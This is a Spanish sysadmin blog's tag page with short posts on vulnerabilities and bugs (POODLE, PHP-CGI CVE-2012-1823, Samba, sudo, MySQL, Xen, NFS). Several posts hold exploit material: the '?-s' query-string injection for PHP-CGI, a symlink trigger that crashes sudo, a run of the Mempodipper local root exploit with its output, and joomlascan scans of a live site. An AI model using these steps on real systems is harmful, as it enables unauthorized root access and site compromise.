Mostrando entradas con la etiqueta bugs. Mostrar todas las entradas
Mostrando entradas con la etiqueta bugs. Mostrar todas las entradas

SSL suma y sigue: Poodle

Este año 2014 va a ser para recordar en la historia de la seguridad informática, sin dudarlo. SSL (heartbleed), bash (CVE-2014-6271 y CVE-2014-7169), y ahora nuevamente el protocolo SSL vuelve a ser noticia con una vulnerabilidad crítica que afecta, por lo que parece, al diseño del protocolo SSL 3.0. El código de fallo es el CVE-2014-3566 y está ahí pues más o menos desde hace 15 años que vio la luz.
El problema está en que a día de hoy la mayoría de los navegadores todavía le dan soporte y por lo tanto son vulnerables. El fallo se puede explotar en un ataque MitM (man-in-the-middle) en el que se fuerce al cliente a emplear el protocolo 3 para así acceder a los datos sin cifrar aunque la sesión esté cifrada.
La solución pasa por deshabilitar el soporte de SSL 3.0 o usar cifrados CBC-mode para dicha versión. El problema de esto no son los navegadores en sí, sino el resto de programas que pueden no tener estas compatibilidades.
Otra de las soluciones recomendadas es habilitar TLS_FALLBACK_SCSV, un mecanismo que soluciona los problemas causados por reintentar conexiones fallidas, previniendo que los atacantes puedan 'obligar' a los navegadores a usar SSL 3.0.

Más información:

Leer más

rats, auditando código fuente

rats es una de esas utilidades que no se suelen emplear y que puedan dar muy buenos resultados en poco tiempo a la hora de programar. La verdad es que yo no conocía este tipo de herramientas (debe ser por la falta de costumbre de programar), pero son muy útiles, ya que permiten detectar fallos triviales en el código, de forma automática. Los típicos con las variables no inicializadas, cast's entre tipos de datos diferentes sin límites, etc.
rats tiene soporte para 5 lenguajes de programación, c, perl, ruby, python y php, con una amplia base de datos de fallos comunes, especialmente c, con 334 entradas. La forma de funcionar típica, es indicarle el tipo de lenguaje de programación (sino lo autodetecta) y los ficheros de entrada. También se le puede decir que saque la salida en formato xml o html. Por defecto, los fallos si no se indica nada, los saca desde la consola.
Al termina de analizar, ofrece unos resultados y el tiempo que tardó en procesar todos los ficheros. Los resultados los agrupo por el tipo de vulnerabilidad que tiene (alta, medio o baja), indicando las líneas en las que se encuentra el fallo, así como información de mismo.
Un ejemplo de ejecución puede ser el que sigue, con sus correspondientes resultados.
shell> rats --language c --input *.c --html > salida.html
Y los resultados obtenidos (copiado del formato html),
------------
Entries in perl database: 33
Entries in ruby database: 46
Entries in python database: 62
Entries in c database: 334
Entries in php database: 55

Analyzing checks_agent.c
Analyzing checks_aggregate.c
Analyzing checks_calculated.c
Analyzing checks_db.c
Analyzing checks_external.c
Analyzing checks_internal.c
Analyzing checks_ipmi.c
Analyzing checks_simple.c
Analyzing checks_snmp.c
Analyzing checks_ssh.c
Analyzing checks_telnet.c
Analyzing poller.c

RATS results

Severity: High
Issue: fixed size global buffer
Extra care should be taken to ensure that character arrays that are allocated on the stack are used safely. They are prime targets for buffer overflow attacks.
    File: checks_agent.c
    Lines: 49
    File: checks_aggregate.c
    Lines: 297
    File: checks_calculated.c
    Lines: 311
    File: checks_internal.c
    Lines: 46 47
    File: checks_ipmi.c
    Lines: 772 862
    File: checks_simple.c
    Lines: 28 29 30 31
    File: checks_snmp.c
    Lines: 248 468 838 839 840 841 842 843
    File: checks_ssh.c
    Lines: 86 343
    File: checks_telnet.c
    Lines: 319 394 516
    File: poller.c
    Lines: 347 447
Severity: Medium
Issue: read
Check buffer boundaries if calling this function in a loop and make sure you are not in danger of writing past the allocated space.
    File: checks_telnet.c
    Lines: 72

Inputs detected at the following points

Total lines analyzed: 5449
Total time 0.007437 seconds
732687 lines per second
------------
La verdad es que es una herramienta interesante si el lenguaje de programación está soportado para controlar los tipos de fallos más comúnmente conocidos y poder corregirlos. Sin duda, ayudará a mejorar la seguridad del código final. Por supuesto, al ser código libre, las bases de datos de vulnerabilidades se pueden seguir mejorando, así como emplear otras conocidas y compatibles (opción --database).
Leer más

Skipping the data of table mysql.event

Recientemente realicé la actualización de los servidores de MySQL/Percona a la última versión estable en Debian. Concretamente ahora tengo la versión 5.5.30 de MySQL. Como es lógico, antes tenía un pequeño script que se encargaba de realizar periódicamente un dump de las bases de datos para poder almacenarlas en backup. Funcionaba perfectamente. Tras la actualización, descubro lo que parece un bug, y todo apunta a ello. Al tratar de hacer un dump de la base de datos mysql, obtengo un warning, no importante, pero sí molesto.


shell> mysqldump -u root -p'passwd' -B mysql > /tmp/mysql.sql
-- Warning: Skipping the data of table mysql.event.
Specify the --events option explicitly.
Y la versión actual de MySQL,
shell> mysql -V
mysql  Ver 14.14 Distrib 5.5.30, for Linux (x86_64) using readline 5.1
La solución adoptada fue indicarle al mysqldump que ignore la tabla event de la base de datos mysql y con eso ya sacamos el warning.
shell> mysqldump -u root -p'passwd' --ignore-table=mysql.event -B mysql > /tmp/mysql.sql
Otra posible solución si deseamos tener copia también de esa tabla es indicar en el proceso del dump que deseamos obtener la tabla events, tal como hacía antes, por defecto. Para ello,
shell> mysqldump -u root -p'passwd' --events -B mysql > /tmp/mysql.sql
Este fallo no sólo es cosa de Debian, sino que sucede en todas las distribuciones que actualizaron la versión de MySQL y está considerado un bug. Se puede leer más acerca de él en bugzilla.redhat.com y en bugs.mysql.com.

La entrada Skipping the data of table mysql.event la puedes leer en Puppet Linux.
Leer más

XenSource, curioso fallo en debian (xm new)

Si usas XenSource, la versión libre de Xen integrada en el kernel de GNU/Linux quizás esto te haya pasado, así que aquí tienes la solución.
Para arrancar una máquina virtual se suele emplear el comando "xm start machine", sin embargo si deseas reservar espacio para algunas de las máquinas es buena idea emplear el comando "xm new machine" or decirlo de alguna forma, con el parámetro new, Xen lo que hace es aprovisionar la máquina en el sistema, pero no arrancarla, lo que es necesario hacer por ejemplo si empleamos algún interfaz gráfico de administración de Xen.
Sin embargo en la versión estable de Debian, al llamar a dicho comando se obtiene un fallo de librerías no encontradas,
shell> xm new pentest.cfg 
Unexpected error: 

Please report to xen-devel@lists.xensource.com
Traceback (most recent call last):
  File "/usr/lib/xen-4.0/bin/xm", line 8, in main.main(sys.argv)
  File "/usr/lib/xen-4.0/lib/python/xen/xm/main.py", line 3620, in main_, rc = _run_cmd(cmd, cmd_name, args)
  File "/usr/lib/xen-4.0/lib/python/xen/xm/main.py", line 3644, in _run_cmd return True, cmd(args)
  File "", line 1, in 
  File "/usr/lib/xen-4.0/lib/python/xen/xm/main.py", line 1449, in xm_importcommand cmd = __import__(command, globals(), locals(), 'xen.xm')
  File "/usr/lib/xen-4.0/lib/python/xen/xm/new.py", line 26, in from xen.xm.xenapi_create import *
  File "/usr/lib/xen-4.0/lib/python/xen/xm/xenapi_create.py", line 22, in from xml.parsers.xmlproc import xmlproc, xmlval, xmldtd
ImportError: No module named xmlproc
Para poder solucionarlo, hay que instalar una librería de manejo de xml para python, concretamente la python-lxml (en la versión Squeeze de Debian).
shell> apt-get install python-lxml
Tras dicha instalación, debemos dejar el fichero /usr/lib/xen-4.0/lib/python/xen/xm/xenapi_create.py tal como sigue (comentada la línea 22).
...
# from xml.parsers.xmlproc import xmlproc, xmlval, xmldtd
...
Al volver a ejecutar el comando funcionará correctamente, dejando la máquina aprovisionada en el servidor Xen, pero sin comenzar la ejecución de la misma.
Leer más

New bug in PHP-CGI

Pues parece que hoy es el día de enunciar vulnerabilidades. Si a primera hora era la de samba, ahora toca una nueva de php, que afecta  a php-cgi. Dicha vulnerabilidad está identificada con el código CVE-2012-1823 y está calificada como crítica ya que a través de inyección de parámetros se puede mostrar el contenido del php ejecutado (contraseñas incluidas) o ejecutar código remoto. Este fallo se viene arrastrando desde 2004, por lo que son muchos los sistemas afectados de inyección de parámetros.
Para explotar dicha vulnerabilidad, simplemente hay que pasarle los parámetros -s, '?-s', o -r, '?-s', como opciones a la página llamada. Por ejemplo, la opción -s lo que hace es directamente mostrar el contenido del php ejecutado, lo que implica una falta de seguridad muy grave.
Los encargados del proyecto ya han desarrollado un parche que se espera en breve llegue a todas las distribuciones empaquetado, pero ya está disponible en código fuente.
Si la actualización es complicada, se aconseja cuando menos añadir al sistema el módulo mod_rewrite de apache, para intentar bloquear las peticiones maliciosas. Las reglas a añadir serían,
RewriteEngine on
RewriteCond% {QUERY_STRING} ^ [^ =] * $
RewriteCond% {QUERY_STRING}% 2d | \ - [NC]
RewriteRule.? - [F, L]
O también el uso de la directiva FilesMatch, que evita que se muestre el contenido de ficheros php importantes.
...
  <filesmatch ^config.php$="">
    Deny from all
  </filesmatch>
...
Nota: FastCGI no es vulnerable!
Nota: Ya hay disponible un módulo para metasploit que aprovecha dicho fallo de seguridad, para hacer PoC.

Para más información: eindbazen.net.
Leer más

New samba fail, CVE-2012-2111

Si hace aproximadamente 15 días se notificaba de un fallo grave de seguridad en el código de Samba (CVE-2012-1182), hoy nuevamente toca advertencia. Un nuevo bug ha sido descubierto por Ivano Cristofolini, y está identificado como CVE-2012-2111. Esta vulnerabilidad permite a un atacante, esta vez autenticado, elevar privilegios a través de conexiones al LSA (Local Security Authority). Concretamente permite elevar los privilegios "take ownership". Explotanto este fallo, cualquier usuario del sistema podrá asignarse a si mismo ese privilegio y por lo tanto, hacerse dueño de ficheros y directorios que no le pertenecen.
El fallo está originado por una incorrecta política de seguridad presente en los procesos RPC (nuevamente). Concretamente en las funciones CreateAccount, OpenAccount, AddAccountRights que no están correctamente delimitadas.
Los desarrolladores ya han hecho los deberes correspondientes y ya hay parches para corregir dicha vulnerabilidad. Están disponibles en la web del proyecto. Las principales distribuciones ya los han aplicado y ya existen paquetes saneados en los repositorios.
También se han descrito unas medidas y recomendaciones para mitigar los fallos a espera de que los parches sean aplicados. Éstas son:
  • Desactivar los privilegios en la sección [global]
    Realizando la siguiente asignación "enable privileges = no"
  • Eliminar cualquier asignación de privilegios
    Para ello habrá que borrar el fichero account_policy.tdb
  • Aplicar los parches de seguridad recomendados
  • Reasignar nuevamente los privilegios
    Para ello, ejecutaremos "net rpc rights"
Más información en: samba.org - CVE-2012-2111
Leer más

Samba fail, CVE-2012-1182

El viernes de la semana pasada se ha anunciado en los foros de Samba una vulnerabilidad crítica afecta a las versiones comprendidas entre la 3.0.X y la 3.6.3, prácticamente 9 años de desarrollo con el bug a cuestas. La vulnerabilidad de etiquetó con el código CVE-2012-1182 y tiene una gravedad alta, ya que permitiría ejecutar código remotamente como usuario root a través de una conexión sin autenticar (sesión anónima).
El fallo está en una función que se encarga de generar el código empleado para empaquetar y desempaquetar las llamadas RPC a través de red. Este error es provocado por la falta de comprobación de concordancia entre la variable que contiene la longitud de un array y la variable usada para reservar memoria para dicho array.
Existe una prueba de concepto que explota dicho fallo creando una llamada RPC especialmente manipulada que logra aprovechar el fallo.
También están ya disponibles los parches para solucionar dicho problema de seguridad en samba.org y las principales distribuciones que lo empaquetan también han hecho los deberes creando ya paquetes no vulnerables.
Más información del bug: samba.org - CVE-2012-1182
Ejemplo de PoC: samba.org.
Leer más

Averiguando fallos en Joomla!

Recientemente descubrí un programa escrito en perl, llamado joomlascan, y que sirve precisamente para lo que os estáis imaginando, escanear páginas web que usen este famoso CMS en busca de vulnerabilidades que faciliten su posterior explotación.
El modo de realizar el escaneo no es demasiado complejo, intenta buscar la versión del núcleo y una vez la tenga, mira el listado de vulnerabilidades conocidas que hay. Luego también presenta la opción de detección de componentes de terceros y de posibles vulnerabilidades que afecten a estos.
Como ya mencioné, es un script en perl, que se puede descargar desde aquí.
shell> joomlascan.pl

    o               |                          
    .,---.,---.,-.-.|    ,---.   ,---.,---.,---.,---.
    ||   ||   || | ||    ,---|---`---.|    ,---||   |
    |`---'`---'` ' '`---'`---^   `---'`---'`---^`   '
`---'

Usage:  joomlascan.pl -u  [options]

  == Options ==
     -p            = proxy:port
     -a            = Admin folder (default '/administration')
     -v            = Check version
     -c            = Check components
     -f            = Check firewall
     -co           = Check bugs in core (require -v)
     -cm           = Check bugs in components (require -c)
     -all          = Check all (default)
     -ot           = Output to text file
     -oh           = Output to html file
     -update       = Search for updates
     -force-update = Force to download updates
     -about        = About joomlascan
     -version      = Print version info
     -h, -help     = This help

  == Examples ==
     To scan running joomla version and components:
       $ joomlascan.pl -u www.host.com -v -c

     To scan version and core bugs:
       $ joomlascan.pl -u www.host.com -v -co
Y a continuación un ejemplo del script en funcionamiento.
shell> joomlascan.pl -u www.host.com -v -c
                                                     
    o               |                                
    .,---.,---.,-.-.|    ,---.   ,---.,---.,---.,---.
    ||   ||   || | ||    ,---|---`---.|    ,---||   |
    |`---'`---'` ' '`---'`---^   `---'`---'`---^`   '
`---'                                                

Running on Apache/2.2.14 (Ubuntu)

Components:
   com_content

Joomla! version [1.5.15.Stable]
Así hemos descubierto la versión de Joomla que se está ejecutando en una web conocida ;-). Si ahora nos interesa ver los fallos de seguridad que hay en el core, lo ejecutamos con la opción -co.
shell> joomlascan.pl -u www.host.com -v -co
                                                     
    o               |                                
    .,---.,---.,-.-.|    ,---.   ,---.,---.,---.,---.
    ||   ||   || | ||    ,---|---`---.|    ,---||   |
    |`---'`---'` ' '`---'`---^   `---'`---'`---^`   '
`---'                                                

Running on Apache/2.2.14 (Ubuntu)

Joomla! version [1.5.15.Stable]

Possible vulnerabilities in core:
================================
Possible vulnerability: Administration Pages Multiple HTML Injection Vulnerabilities
Versions affected: Joomla! [1.5.0-1.5.19]
Detail: Joomla! is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data.Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
More info: http://www.securityfocus.com/bid/41822

Possible vulnerability: HTML Injection and SQL Injection Vulnerabilities
Versions affected: Joomla! [1.5.0-1.5.18]
Detail: Joomla! is prone to multiple HTML-injection vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.A successful exploit can allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
More info: http://www.securityfocus.com/bid/41743

Possible vulnerability: Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities
Versions affected: Joomla! [1.5.0-1.5.17]
Detail: Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
More info: http://www.securityfocus.com/bid/40444

Possible vulnerability: Session Fixation Vulnerability
Versions affected: Joomla! [1.5.0-1.5.15]
Detail: Joomla! is prone to a session-fixation vulnerability.Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
More info: http://www.securityfocus.com/bid/39708

Possible vulnerability: Persistant XSS Vulnerability
Versions affected: Joomla! 1.5.15
Detail: Persistant XSS Vulnerability
More info: http://inj3ct0r.com/exploits/11088
Y si queremos observar los posibles bug's que hay en los módulos que tenga instalados, simplemente la opción -cm, aunque para estos componentes no se contempla la versión del mismo instalada, sino únicamente el módulo, por lo que podemos encontrarnos con algún falso positivo.
shell> joomlascan.pl -u www.host.com -c -cm

    o               |                                
    .,---.,---.,-.-.|    ,---.   ,---.,---.,---.,---.
    ||   ||   || | ||    ,---|---`---.|    ,---||   |
    |`---'`---'` ' '`---'`---^   `---'`---'`---^`   '
`---'                                                
 
Searching for components 
 
Running on Apache/2.2.14 (Ubuntu)

Components:
 com_content

Possible vulnerabilities in components:
======================================
Possible vulnerability: TinyBrowser Joomla! Component 'folders.php' Local File Include Vulnerability
Versions affected: Lunarvis TinyBrowser 1.41.6
Detail: The TinyBrowser component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
More info: http://www.securityfocus.com/bid/335843

Possible vulnerability: XStandard Component Directory Traversal Vulnerability
Versions affected: Joomla XStandard
Detail: The XStandard component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
More info: http://www.securityfocus.com/bid/33143

Possible vulnerability: Component com_content File Upload Vulnerability
Versions affected: com_content
Detail: Joomla Component com_content File Upload Vulnerability
More info: http://inj3ct0r.com/exploits/14165
Lo que luego se puede hacer con cada una de las posibles vulnerabilidades ya es cosa de cada atacante, pero como aplicación de auditoría interna esta herramienta puede resultar muy útil. Como siempre, la forma de estar protegido, tener el sistema lo más actualizado posible.

Más información: blog.pepelux.org.
Leer más

Fallo de seguridad en sudo

Se ha publicado recientemente un importante fallo en el paquete sudo. La vulnerabilidad está en el formado de la cadena, que permite realizar un bloqueo del programa. A fecha de ahora no existe ningún exploit que permita realizar una escalada de privilegios.
El fallo afecta a las versiones 1.8.0 y posteriores, por lo que los equipos con versiones estables no se ven afectados. Debian Squeeze, 1.7.4, Ubuntu 11.10, 1.7.x. Sólo te verás afectado si estás trabajando con debian testing, o superior, o instalaste el paquete manualmente.
Las soluciones momentáneas son, o bien recompilar el paquete con el flag "-D_FORTIFY_SOURCE=2", o actualizar el paquete del repositorio oficial, que ya está corregido en la versión 1.8.3p2.
Un ejemplo de la sencillez de explotación es el siguiente,
shell> ln -s /usr/bin/sudo ./%s
shell> ./%s -D9
Segmentation fault
Más info: http://www.sudo.ws/sudo/alerts/sudo_debug.html
Leer más

Linux Local Exploit

Recientemente ha salido un exploit que afecta a las versiones del kernel >= 2.6.39 y que permite escribir directamente en el interfaz mem de los procesos /proc/PID/mem. El problema está en que el los kerneles afectados se consideraba suficiente la protección contra acceso no autorizado, por lo que se retiró la directiva #ifdef, que impedía dicha escritura. El resultado, cualquier persona que tenga los permisos adecuados, puede escribir en dicha memoria. Por supuesto, este bug sólo puede ser explotado a nivel local, pero aún así es peligroso.
Un ejemplo del exploit en funcionamiento.
shell> uname -r
3.0.0-12-generic
shell> ls
mempodipper.c
shell> whoami 
javier
shell> gcc mempodipper.c -o mempodipper
shell> ./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/4384/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x8049520.
[+] Calculating su padding.
[+] Seeking to offset 0x8049510.
[+] Executing su with shellcode.
# whoami
root
# p0wned!

Para más información: http://blog.zx2c4.com/749
Un exploit: http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

Por el momento no hay un parche disponible que solucione el fallo. La solución, trabajar con kerneles menores de la versión 2.6.39, que no están afectados.
Leer más

Ruby: fallo de seguridad criptográfica


Justo antes de ir a dormir me entero vía unaaldía y el canal svn  de Ruby que se acaba de publicar un importante fallo de seguridad en los sistemas de cifrado de Ruby. Concretamente en la librería que se encarga de generar las claves de los algoritmos RSA. Esto deja al sistema un poco indefenso ante ataques de fuerza bruta a la hora de adivinar la clave RSA, ya que dejan de ser todo lo aleatorias que debería. Algo similar al fallo CVE-2008-0166 de Debian en OpenSSL.
El anuncio oficial se dio en el canal SVN de Ruby:
ext/openssl/ossl_pkey_rsa.c (rsa_generate): [SECURITY] Set RSA exponent value correctly. Awful bug. This bug caused exponent of generated key to be always '1'. By default, and regardless of e given as a parameter.

!!! Keys generated by this code (trunk after 2011-09-01) must be re-generated !!! (ruby_1_9_3 is safe)
Ya hay una nueva release que corrige el fallo detectado, por lo que es muy recomendable actualizar y generar nuevamente las claves RSA si la versión usada está afectada y se han generado claves con ella.

Más info:
http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=33633
http://unaaldia.hispasec.com/2011/11/horrible-fallo-de-seguridad.html
Leer más

Fallo importante en RPM

Red Hat, principal valedora y desarrolladora del popular forma de paquetes RPM ha notificado un fallo de seguridad que afecta a la librearía que maneja las cabeceras de dichos paquetes. El fallo podría permitir, a un potencial atacante, provocar una denegación de servicio o ejecutar código arbitrario gracias a un .rpm especialmente creado.
La vulnerabilidad: CVE-2011-3378.
Más info en: bugzilla.redhat.comredhat.com/.../CVE-2011-3378

Red Hat por su parte ya tiene disponibles actualizaciones de seguridad para todas las plataformas afectadas.
Leer más

NFS SLES 11 SP-1 crash

Aunque habitualmente uso sistemas basados en Debian, en ciertos equipos del trabajo administro sistemas Suse y Red Hat. No tengo nada en contra de ellas y es más, suelen funcionar muy bien, las pocas cosas que les permiten hacer, las hacen bien y no suelen dar fallos.
El otro día estaba trabajando con una SLES 11 SP1 y necesitaba montar un servidor de ficheros (NFS) para compartir unos datos entre equipos. Como es lógico, empleé YAST e instalé el servicio. Una vez configurado y arrancado todo perfecto, pero desde los clientes era imposible acceder. En los log's del servidor se veía que arrancaba el servico correctamente y al configuración también era correcta, pero al acceder desde el cliente aparecían estas líneas sospechosas en los log's.
nfsd: last server has exited, flushing export cache
NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
NFSD: starting 90-second grace period
rpc.mountd[3842]: segfault at fffffffe80000017 ip 00007fa393b60ee8 sp 00007fff9bb6d370 error 4 in rpc.mountd[7fa393b5b000+16000]
segfault en un log, es la típica palabra que no presagia nada bueno. Y así fue.
Probé a montar el recurso desde otro equipo y volvía a pasar exactamente lo mismo y por lo que parece, todo apunta a un fallo en el servidor NFS de SLES 11 SP1.
La solución fue realizar un downgrade de dicho servicio a SLES 11 y ya todo funcionó perfectamente. Por suerte, la configuración de los servidores NFS no es nada compleja y este cambio no afectó ni llevó excesivo tiempo.
Se reportará el fallo a Novell para que intenten solucionarlo. El servidor empleaba SLES 11 SP1 x86_64. No probé para la plataforma i386.
Leer más

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios